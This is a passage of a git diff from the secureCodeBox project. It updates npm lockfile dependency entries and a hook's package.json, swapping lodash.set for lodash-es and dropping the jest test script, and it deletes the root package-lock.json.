"@jest/schemas": "^29.6.0", - "ansi-styles": "^5.0.0", - "react-is": "^18.0.0" - }, - "dependencies": { - "ansi-styles": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", - "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", - "dev": true - } + "fill-range": "^7.1.1" } }, - "prompts": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/prompts/-/prompts-2.4.2.tgz", - "integrity": "sha512-NxNv/kLguCA7p3jE8oL2aEBsrJWgAakBpgmgK6lpPWV+WuOmY6r2/zbAVnP+T8bQlA0nzHXSJSJW0Hq7ylaD2Q==", + "chalk": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", + "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", "dev": true, "requires": { - "kleur": "^3.0.3", - "sisteransi": "^1.0.5" + "ansi-styles": "^4.1.0", + "supports-color": "^7.1.0" } }, - "pure-rand": { - "version": "6.0.2", - "resolved": "https://registry.npmjs.org/pure-rand/-/pure-rand-6.0.2.tgz", - "integrity": "sha512-6Yg0ekpKICSjPswYOuC5sku/TSWaRYlA0qsXqJgM/d/4pLPHPuTxK7Nbf7jFKzAeedUhR8C7K9Uv63FBsSo8xQ==", - "dev": true + "color-convert": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", + "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", + "dev": true, + "requires": { + "color-name": "~1.1.4" + } }, - "react-is": { - "version": "18.2.0", - "resolved": "https://registry.npmjs.org/react-is/-/react-is-18.2.0.tgz", - "integrity": "sha512-xWGDIW6x921xtzPkhiULtthJHoJvBbF3q26fzloPCK0hsvxtPVelvftw3zjbHWSkR2km9Z+4uxbDDK/6Zw9B8w==", + "color-name": { + "version": "1.1.4", + "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", + "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==", "dev": true }, - "require-directory": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/require-directory/-/require-directory-2.1.1.tgz", - "integrity": "sha512-fGxEI7+wsG9xrvdjsrlmL22OMTTiHRwAMroiEeMgq8gzoLC/PQr7RsRDSTLUg/bZAZtF+TVIkHc6/4RIKrui+Q==", + "escape-string-regexp": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-2.0.0.tgz", + "integrity": "sha512-UpzcLCXolUWcNu5HtVMHYdXJjArjsF9C0aNnquZYY4uW/Vu0miy5YoWvbV345HauVvcAUnpRuhMMcqTcGOY2+w==", "dev": true }, - "resolve": { - "version": "1.22.2", - "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.2.tgz", - "integrity": "sha512-Sb+mjNHOULsBv818T40qSPeRiuWLyaGMa5ewydRLFimneixmVy2zdivRl+AF6jaYPC8ERxGDmFSiqui6SfPd+g==", + "fill-range": { + "version": "7.1.1", + "resolved": "https://registry.npmjs.org/fill-range/-/fill-range-7.1.1.tgz", + "integrity": "sha512-YsGpe3WHLK8ZYi4tWDg2Jy3ebRz2rXowDxnld4bkQB00cc/1Zw9AWnC0i9ztDJitivtQvaI9KaLyKrc+hBW0yg==", "dev": true, "requires": { - "is-core-module": "^2.11.0", - "path-parse": "^1.0.7", - "supports-preserve-symlinks-flag": "^1.0.0" + "to-regex-range": "^5.0.1" } }, - "resolve-cwd": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/resolve-cwd/-/resolve-cwd-3.0.0.tgz", - "integrity": "sha512-OrZaX2Mb+rJCpH/6CpSqt9xFVpN++x01XnN2ie9g6P5/3xelLAkXWVADpdz1IHD/KFfEXyE6V0U01OQ3UO2rEg==", - "dev": true, - "requires": { - "resolve-from": "^5.0.0" - } + "graceful-fs": { + "version": "4.2.11", + "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.11.tgz", + "integrity": "sha512-RbJ5/jmFcNNCcDV5o9eTnBLJ/HszWV0P73bc+Ff4nS/rJj+YaS6IGyiOL0VoBYX+l1Wrl3k63h/KrH+nhJ0XvQ==", + "dev": true }, - "resolve-from": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-5.0.0.tgz", - "integrity": "sha512-qYg9KP24dD5qka9J47d0aVky0N+b4fTU89LN9iDnjB5waksiC49rvMB0PrUJQGoTmH50XPiqOvAjDfaijGxYZw==", + "has-flag": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", + "integrity": "sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==", "dev": true }, - "resolve.exports": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/resolve.exports/-/resolve.exports-2.0.2.tgz", - "integrity": "sha512-X2UW6Nw3n/aMgDVy+0rSqgHlv39WZAlZrXCdnbyEiKm17DSqHX4MmQMaST3FbeWR5FTuRcUwYAziZajji0Y7mg==", + "is-number": { + "version": "7.0.0", + "resolved": "https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz", + "integrity": "sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==", "dev": true }, - "semver": { - "version": "6.3.1", - "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", - "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", + "js-tokens": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz", + "integrity": "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==", "dev": true }, - "shebang-command": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz", - "integrity": "sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==", + "lodash-es": { + "version": "4.17.21", + "resolved": "https://registry.npmjs.org/lodash-es/-/lodash-es-4.17.21.tgz", + "integrity": "sha512-mKnC+QJ9pWVzv+C4/U3rRsHapFfHvQFoFB92e52xeyGMcX6/OlIl78je1u8vePzYZSkkogMPJ2yjxxsb89cxyw==" + }, + "micromatch": { + "version": "4.0.8", + "resolved": "https://registry.npmjs.org/micromatch/-/micromatch-4.0.8.tgz", + "integrity": "sha512-PXwfBhYu0hBCPw8Dn0E+WDYb7af3dSLVWKi3HGv84IdF4TyFoC0ysxFd0Goxw7nSv4T/PzEJQxsYsEiFCKo2BA==", "dev": true, "requires": { - "shebang-regex": "^3.0.0" + "braces": "^3.0.3", + "picomatch": "^2.3.1" } }, - "shebang-regex": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/shebang-regex/-/shebang-regex-3.0.0.tgz", - "integrity": "sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==", + "picocolors": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.1.1.tgz", + "integrity": "sha512-xceH2snhtb5M9liqDsmEw56le376mTZkEX/jEb/RxNFyegNul7eNslCXP9FDj/Lcu0X8KEyMceP2ntpaHrDEVA==", "dev": true }, - "signal-exit": { - "version": "3.0.7", - "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-3.0.7.tgz", - "integrity": "sha512-wnD2ZE+l+SPC/uoS0vXeE9L1+0wuaMqKlfz9AMUo38JsyLSBWSFcHR1Rri62LZc12vLr1gb3jl7iwQhgwpAbGQ==", + "picomatch": { + "version": "2.3.1", + "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.1.tgz", + "integrity": "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==", "dev": true }, - "sisteransi": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/sisteransi/-/sisteransi-1.0.5.tgz", - "integrity": "sha512-bLGGlR1QxBcynn2d5YmDX4MGjlZvy2MRBDRNHLJ8VI6l6+9FUiyTFNJ0IveOSP0bcXgVDPRcfGqA0pjaqUpfVg==", + "react-is": { + "version": "18.3.1", + "resolved": "https://registry.npmjs.org/react-is/-/react-is-18.3.1.tgz", + "integrity": "sha512-/LLMVyas0ljjAtoYiPqYiL8VWXzUUdThrmU5+n20DZv+a+ClRoevUzw5JxU+Ieh5/c87ytoTBV9G1FiKfNJdmg==", "dev": true }, "slash": { @@ -5970,28 +952,6 @@ "integrity": "sha512-g9Q1haeby36OSStwb4ntCGGGaKsaVSjQ68fBxoQcutl5fS1vuY18H3wSt3jFyFtrkx+Kz0V1G85A4MyAdDMi2Q==", "dev": true }, - "source-map": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.6.1.tgz", - "integrity": "sha512-UjgapumWlbMhkBgzT7Ykc5YXUT46F0iKu8SGXq0bcwP5dz/h0Plj6enJqjz1Zbq2l5WaqYnrVbwWOWMyF3F47g==", - "dev": true - }, - "source-map-support": { - "version": "0.5.13", - "resolved": "https://registry.npmjs.org/source-map-support/-/source-map-support-0.5.13.tgz", - "integrity": "sha512-SHSKFHadjVA5oR4PPqhtAVdcBWwRYVd6g6cAXnIbRiIwc2EhPrTuKUBdSLvlEKyIP3GCf89fltvcZiP9MMFA1w==", - "dev": true, - "requires": { - "buffer-from": "^1.0.0", - "source-map": "^0.6.0" - } - }, - "sprintf-js": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.0.3.tgz", - "integrity": "sha512-D9cPgkvLlV3t3IzL0D0YLvGA9Ahk4PcvVwUbN0dSGr1aP0Nrt4AEnTUbuGvquEC0mA64Gqt1fzirlRs5ibXx8g==", - "dev": true - }, "stack-utils": { "version": "2.0.6", "resolved": "https://registry.npmjs.org/stack-utils/-/stack-utils-2.0.6.tgz", @@ -6001,54 +961,6 @@ "escape-string-regexp": "^2.0.0" } }, - "string-length": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/string-length/-/string-length-4.0.2.tgz", - "integrity": "sha512-+l6rNN5fYHNhZZy41RXsYptCjA2Igmq4EG7kZAYFQI1E1VTXarr6ZPXBg6eq7Y6eK4FEhY6AJlyuFIb/v/S0VQ==", - "dev": true, - "requires": { - "char-regex": "^1.0.2", - "strip-ansi": "^6.0.0" - } - }, - "string-width": { - "version": "4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", - "dev": true, - "requires": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" - } - }, - "strip-ansi": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "dev": true, - "requires": { - "ansi-regex": "^5.0.1" - } - }, - "strip-bom": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/strip-bom/-/strip-bom-4.0.0.tgz", - "integrity": "sha512-3xurFv5tEgii33Zi8Jtp55wEIILR9eh34FAW00PZf+JnSsTmV/ioewSgQl97JHvgjoRGwPShsWm+IdrxB35d0w==", - "dev": true - }, - "strip-final-newline": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/strip-final-newline/-/strip-final-newline-2.0.0.tgz", - "integrity": "sha512-BrpvfNAE3dcvq7ll3xVumzjKjZQ5tI1sEUIKr3Uoks0XUl45St3FlatVqef9prk4jRDzhW6WZg+3bk93y6pLjA==", - "dev": true - }, - "strip-json-comments": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/strip-json-comments/-/strip-json-comments-3.1.1.tgz", - "integrity": "sha512-6fPc+R4ihwqP6N/aIv2f1gMH8lOVtWQHoqC4yK6oSDVVocumAsfCqjkXnqiYMhmMwS/mEHLp7Vehlt3ql6lEig==", - "dev": true - }, "supports-color": { "version": "7.2.0", "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", @@ -6058,35 +970,6 @@ "has-flag": "^4.0.0" } }, - "supports-preserve-symlinks-flag": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", - "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==", - "dev": true - }, - "test-exclude": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/test-exclude/-/test-exclude-6.0.0.tgz", - "integrity": "sha512-cAGWPIyOHU6zlmg88jwm7VRyXnMN7iV68OGAbYDk/Mh/xC/pzVPlQtY6ngoIH/5/tciuhGfvESU8GrHrcxD56w==", - "dev": true, - "requires": { - "@istanbuljs/schema": "^0.1.2", - "glob": "^7.1.4", - "minimatch": "^3.0.4" - } - }, - "tmpl": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/tmpl/-/tmpl-1.0.5.tgz", - "integrity": "sha512-3f0uOEAQwIqGuWW2MVzYg8fV/QNnc/IpuJNG837rLuczAaLVHslWHZQj4IGiEl5Hs3kkbhwL9Ab7Hrsmuj+Smw==", - "dev": true - }, - "to-fast-properties": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/to-fast-properties/-/to-fast-properties-2.0.0.tgz", - "integrity": "sha512-/OaKK0xYrs3DmxRYqL/yDc+FxFUVYhDlXMhRmv3z915w2HF1tnN1omB354j8VUGO/hbRzyD6Y3sA7v7GS/ceog==", - "dev": true - }, "to-regex-range": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/to-regex-range/-/to-regex-range-5.0.1.tgz", @@ -6095,131 +978,6 @@ "requires": { "is-number": "^7.0.0" } - }, - "type-detect": { - "version": "4.0.8", - "resolved": "https://registry.npmjs.org/type-detect/-/type-detect-4.0.8.tgz", - "integrity": "sha512-0fr/mIH1dlO+x7TlcMy+bIDqKPsw/70tVyeHW787goQjhmqaZe10uwLujubK9q9Lg6Fiho1KUKDYz0Z7k7g5/g==", - "dev": true - }, - "type-fest": { - "version": "0.21.3", - "resolved": "https://registry.npmjs.org/type-fest/-/type-fest-0.21.3.tgz", - "integrity": "sha512-t0rzBq87m3fVcduHDUFhKmyyX+9eo6WQjZvf51Ea/M0Q7+T374Jp1aUiyUl0GKxp8M/OETVHSDvmkyPgvX+X2w==", - "dev": true - }, - "update-browserslist-db": { - "version": "1.0.11", - "resolved": "https://registry.npmjs.org/update-browserslist-db/-/update-browserslist-db-1.0.11.tgz", - "integrity": "sha512-dCwEFf0/oT85M1fHBg4F0jtLwJrutGoHSQXCh7u4o2t1drG+c0a9Flnqww6XUKSfQMPpJBRjU8d4RXB09qtvaA==", - "dev": true, - "requires": { - "escalade": "^3.1.1", - "picocolors": "^1.0.0" - } - }, - "v8-to-istanbul": { - "version": "9.1.0", - "resolved": "https://registry.npmjs.org/v8-to-istanbul/-/v8-to-istanbul-9.1.0.tgz", - "integrity": "sha512-6z3GW9x8G1gd+JIIgQQQxXuiJtCXeAjp6RaPEPLv62mH3iPHPxV6W3robxtCzNErRo6ZwTmzWhsbNvjyEBKzKA==", - "dev": true, - "requires": { - "@jridgewell/trace-mapping": "^0.3.12", - "@types/istanbul-lib-coverage": "^2.0.1", - "convert-source-map": "^1.6.0" - }, - "dependencies": { - "convert-source-map": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-1.9.0.tgz", - "integrity": "sha512-ASFBup0Mz1uyiIjANan1jzLQami9z1PoYSZCiiYW2FczPbenXc45FZdBZLzOT+r6+iciuEModtmCti+hjaAk0A==", - "dev": true - } - } - }, - "walker": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/walker/-/walker-1.0.8.tgz", - "integrity": "sha512-ts/8E8l5b7kY0vlWLewOkDXMmPdLcVV4GmOQLyxuSswIJsweeFZtAsMF7k1Nszz+TYBQrlYRmzOnr398y1JemQ==", - "dev": true, - "requires": { - "makeerror": "1.0.12" - } - }, - "which": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz", - "integrity": "sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==", - "dev": true, - "requires": { - "isexe": "^2.0.0" - } - }, - "wrap-ansi": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", - "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", - "dev": true, - "requires": { - "ansi-styles": "^4.0.0", - "string-width": "^4.1.0", - "strip-ansi": "^6.0.0" - } - }, - "wrappy": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", - "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==", - "dev": true - }, - "write-file-atomic": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-4.0.2.tgz", - "integrity": "sha512-7KxauUdBmSdWnmpaGFg+ppNjKF8uNLry8LyzjauQDOVONfFLNKrKvQOxZ/VuTIcS/gge/YNahf5RIIQWTSarlg==", - "dev": true, - "requires": { - "imurmurhash": "^0.1.4", - "signal-exit": "^3.0.7" - } - }, - "y18n": { - "version": "5.0.8", - "resolved": "https://registry.npmjs.org/y18n/-/y18n-5.0.8.tgz", - "integrity": "sha512-0pfFzegeDWJHJIAmTLRP2DwHjdF5s7jo9tuztdQxAhINCdvS+3nGINqPd00AphqJR/0LhANUS6/+7SCb98YOfA==", - "dev": true - }, - "yallist": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-3.1.1.tgz", - "integrity": "sha512-a4UGQaWPH59mOXUYnAG2ewncQS4i4F43Tv3JoAM+s2VDAmS9NsK8GpDMLrCHPksFT7h3K6TOoUNn2pb7RoXx4g==", - "dev": true - }, - "yargs": { - "version": "17.7.2", - "resolved": "https://registry.npmjs.org/yargs/-/yargs-17.7.2.tgz", - "integrity": "sha512-7dSzzRQ++CKnNI/krKnYRV7JKKPUXMEh61soaHKg9mrWEhzFWhFnxPxGl+69cD1Ou63C13NUPCnmIcrvqCuM6w==", - "dev": true, - "requires": { - "cliui": "^8.0.1", - "escalade": "^3.1.1", - "get-caller-file": "^2.0.5", - "require-directory": "^2.1.1", - "string-width": "^4.2.3", - "y18n": "^5.0.5", - "yargs-parser": "^21.1.1" - } - }, - "yargs-parser": { - "version": "21.1.1", - "resolved": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-21.1.1.tgz", - "integrity": "sha512-tVpsJW7DdjecAiFpbIB1e3qxIQsE6NoPc5/eTdrbbIC4h0LVsWhnoa3g+m2HclBIujHzsxZ4VJVA+GUuc2/LBw==", - "dev": true - }, - "yocto-queue": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/yocto-queue/-/yocto-queue-0.1.0.tgz", - "integrity": "sha512-rVksvsnNCdJ/ohGc6xgPwyN8eheCxsiLM8mxuE/t/mOVqJewPuO1miLpTHQiRgTKCLexL4MeAFVagts7HmNZ2Q==", - "dev": true } } } diff --git a/hooks/update-field-hook/hook/package.json b/hooks/update-field-hook/hook/package.json index 580c565c2a..a90702da44 100644 --- a/hooks/update-field-hook/hook/package.json +++ b/hooks/update-field-hook/hook/package.json @@ -8,9 +8,7 @@ "url": "git+https://github.com/secureCodeBox/secureCodeBox.git" }, "main": "hook.js", - "scripts": { - "test": "jest --verbose --ci --colors --coverage --passWithNoTests" - }, + "scripts": {}, "keywords": [ "secureCodeBox", "security", @@ -36,10 +34,9 @@ }, "license": "Apache-2.0", "dependencies": { - "lodash.set": "^4.3.2" + "lodash-es": "^4.17.21" }, "devDependencies": { - "@types/jest": "^29.4.0", - "jest": "^29.3.1" + "@types/jest": "^30.0.0" } } diff --git a/package-lock.json b/package-lock.json deleted file mode 100644 index da552110cf..0000000000 --- a/package-lock.json +++ /dev/null @@ -1,10841 +0,0 @@ -{ - "name": "@securecodebox/securecodebox", - "version": "1.0.1", - "lockfileVersion": 2, - "requires": true, - "packages": { - "": { - "name": "@securecodebox/securecodebox", - "version": "1.0.1", - "license": "Apache-2.0", - "dependencies": { - "@kubernetes/client-node": "^0.22.3" - }, - "devDependencies": { - "@types/jest": "^29.5.14", - "@types/node": "^22.10.2", - "jest": "^29.7.0", - "jest-runner-eslint": "^2.2.1", - "prettier": "^3.4.2", - "ts-jest": "^29.2.5", - "typescript": "^5.7.2" - } - }, - "node_modules/@ampproject/remapping": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/@ampproject/remapping/-/remapping-2.3.0.tgz", - "integrity": "sha512-30iZtAPgz+LTIYoeivqYo853f02jBYSd5uGnGpkFV0M3xOt9aN73erkgYAmZU43x4VfqcnLxW9Kpg3R5LC4YYw==", - "dev": true, - "dependencies": { - "@jridgewell/gen-mapping": "^0.3.5", - "@jridgewell/trace-mapping": "^0.3.24" - }, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@babel/code-frame": { - "version": "7.12.11", - "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.12.11.tgz", - "integrity": "sha512-Zt1yodBx1UcyiePMSkWnU4hPqhwq7hGi2nFL1LeA3EUl+q2LQx16MISgJ0+z7dnmgvP9QtIleuETGOiOH1RcIw==", - "dev": true, - "dependencies": { - "@babel/highlight": "^7.10.4" - } - }, - "node_modules/@babel/compat-data": { - "version": "7.24.4", - "resolved": "https://registry.npmjs.org/@babel/compat-data/-/compat-data-7.24.4.tgz", - "integrity": "sha512-vg8Gih2MLK+kOkHJp4gBEIkyaIi00jgWot2D9QOmmfLC8jINSOzmCLta6Bvz/JSBCqnegV0L80jhxkol5GWNfQ==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/core": { - "version": "7.24.4", - "resolved": "https://registry.npmjs.org/@babel/core/-/core-7.24.4.tgz", - "integrity": "sha512-MBVlMXP+kkl5394RBLSxxk/iLTeVGuXTV3cIDXavPpMMqnSnt6apKgan/U8O3USWZCWZT/TbgfEpKa4uMgN4Dg==", - "dev": true, - "dependencies": { - "@ampproject/remapping": "^2.2.0", - "@babel/code-frame": "^7.24.2", - "@babel/generator": "^7.24.4", - "@babel/helper-compilation-targets": "^7.23.6", - "@babel/helper-module-transforms": "^7.23.3", - "@babel/helpers": "^7.24.4", - "@babel/parser": "^7.24.4", - "@babel/template": "^7.24.0", - "@babel/traverse": "^7.24.1", - "@babel/types": "^7.24.0", - "convert-source-map": "^2.0.0", - "debug": "^4.1.0", - "gensync": "^1.0.0-beta.2", - "json5": "^2.2.3", - "semver": "^6.3.1" - }, - "engines": { - "node": ">=6.9.0" - }, - "funding": { - "type": "opencollective", - "url": "https://opencollective.com/babel" - } - }, - "node_modules/@babel/core/node_modules/@babel/code-frame": { - "version": "7.24.2", - "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.24.2.tgz", - "integrity": "sha512-y5+tLQyV8pg3fsiln67BVLD1P13Eg4lh5RW9mF0zUuvLrv9uIQ4MCL+CRT+FTsBlBjcIan6PGsLcBN0m3ClUyQ==", - "dev": true, - "dependencies": { - "@babel/highlight": "^7.24.2", - "picocolors": "^1.0.0" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/core/node_modules/semver": { - "version": "6.3.1", - "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", - "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", - "dev": true, - "bin": { - "semver": "bin/semver.js" - } - }, - "node_modules/@babel/generator": { - "version": "7.24.4", - "resolved": "https://registry.npmjs.org/@babel/generator/-/generator-7.24.4.tgz", - "integrity": "sha512-Xd6+v6SnjWVx/nus+y0l1sxMOTOMBkyL4+BIdbALyatQnAe/SRVjANeDPSCYaX+i1iJmuGSKf3Z+E+V/va1Hvw==", - "dev": true, - "dependencies": { - "@babel/types": "^7.24.0", - "@jridgewell/gen-mapping": "^0.3.5", - "@jridgewell/trace-mapping": "^0.3.25", - "jsesc": "^2.5.1" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-compilation-targets": { - "version": "7.23.6", - "resolved": "https://registry.npmjs.org/@babel/helper-compilation-targets/-/helper-compilation-targets-7.23.6.tgz", - "integrity": "sha512-9JB548GZoQVmzrFgp8o7KxdgkTGm6xs9DW0o/Pim72UDjzr5ObUQ6ZzYPqA+g9OTS2bBQoctLJrky0RDCAWRgQ==", - "dev": true, - "dependencies": { - "@babel/compat-data": "^7.23.5", - "@babel/helper-validator-option": "^7.23.5", - "browserslist": "^4.22.2", - "lru-cache": "^5.1.1", - "semver": "^6.3.1" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-compilation-targets/node_modules/lru-cache": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-5.1.1.tgz", - "integrity": "sha512-KpNARQA3Iwv+jTA0utUVVbrh+Jlrr1Fv0e56GGzAFOXN7dk/FviaDW8LHmK52DlcH4WP2n6gI8vN1aesBFgo9w==", - "dev": true, - "dependencies": { - "yallist": "^3.0.2" - } - }, - "node_modules/@babel/helper-compilation-targets/node_modules/semver": { - "version": "6.3.1", - "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", - "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", - "dev": true, - "bin": { - "semver": "bin/semver.js" - } - }, - "node_modules/@babel/helper-compilation-targets/node_modules/yallist": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-3.1.1.tgz", - "integrity": "sha512-a4UGQaWPH59mOXUYnAG2ewncQS4i4F43Tv3JoAM+s2VDAmS9NsK8GpDMLrCHPksFT7h3K6TOoUNn2pb7RoXx4g==", - "dev": true - }, - "node_modules/@babel/helper-environment-visitor": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/helper-environment-visitor/-/helper-environment-visitor-7.22.20.tgz", - "integrity": "sha512-zfedSIzFhat/gFhWfHtgWvlec0nqB9YEIVrpuwjruLlXfUSnA8cJB0miHKwqDnQ7d32aKo2xt88/xZptwxbfhA==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-function-name": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/helper-function-name/-/helper-function-name-7.23.0.tgz", - "integrity": "sha512-OErEqsrxjZTJciZ4Oo+eoZqeW9UIiOcuYKRJA4ZAgV9myA+pOXhhmpfNCKjEH/auVfEYVFJ6y1Tc4r0eIApqiw==", - "dev": true, - "dependencies": { - "@babel/template": "^7.22.15", - "@babel/types": "^7.23.0" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-hoist-variables": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-hoist-variables/-/helper-hoist-variables-7.22.5.tgz", - "integrity": "sha512-wGjk9QZVzvknA6yKIUURb8zY3grXCcOZt+/7Wcy8O2uctxhplmUPkOdlgoNhmdVee2c92JXbf1xpMtVNbfoxRw==", - "dev": true, - "dependencies": { - "@babel/types": "^7.22.5" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-module-imports": { - "version": "7.24.3", - "resolved": "https://registry.npmjs.org/@babel/helper-module-imports/-/helper-module-imports-7.24.3.tgz", - "integrity": "sha512-viKb0F9f2s0BCS22QSF308z/+1YWKV/76mwt61NBzS5izMzDPwdq1pTrzf+Li3npBWX9KdQbkeCt1jSAM7lZqg==", - "dev": true, - "dependencies": { - "@babel/types": "^7.24.0" - }, - "engines": { - "node": ">=6.9.0" - } - }, - 